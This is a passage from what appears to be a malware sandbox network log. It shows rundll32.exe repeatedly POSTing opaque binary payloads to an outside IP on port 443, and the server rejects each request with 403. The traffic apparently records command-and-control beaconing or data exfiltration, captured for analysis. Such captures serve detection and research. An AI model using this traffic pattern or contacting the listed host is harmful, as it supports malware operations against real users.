                                                                                                      2021-10-28 02:54:40 UTC50OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:40 UTC54INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:40 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      11192.168.2.749777192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:41 UTC54OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:41 UTC55OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:41 UTC59INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:41 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      12192.168.2.749783192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:44 UTC59OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:44 UTC60OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:44 UTC64INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:44 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      13192.168.2.749786192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:44 UTC64OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:44 UTC65OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:45 UTC69INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:45 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      14192.168.2.749798192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:48 UTC69OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:48 UTC70OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:48 UTC74INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:48 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      15192.168.2.749800192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:48 UTC74OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:48 UTC75OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:49 UTC79INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:49 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      16192.168.2.749806192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:51 UTC79OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:51 UTC80OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:52 UTC89INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:52 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      17192.168.2.749808192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:52 UTC84OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:52 UTC84OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:53 UTC89INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:53 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      18192.168.2.749820192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:55 UTC89OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:55 UTC90OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:56 UTC99INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:56 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      19192.168.2.749822192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:56 UTC94OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:56 UTC94OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:57 UTC99INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:57 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      2192.168.2.749729192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:23 UTC9OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:23 UTC10OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:23 UTC14INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:23 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      20192.168.2.749828192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:59 UTC99OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:59 UTC100OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:00 UTC109INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:00 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      21192.168.2.749830192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:00 UTC104OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:00 UTC104OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:00 UTC109INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:00 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      22192.168.2.749839192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:03 UTC109OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
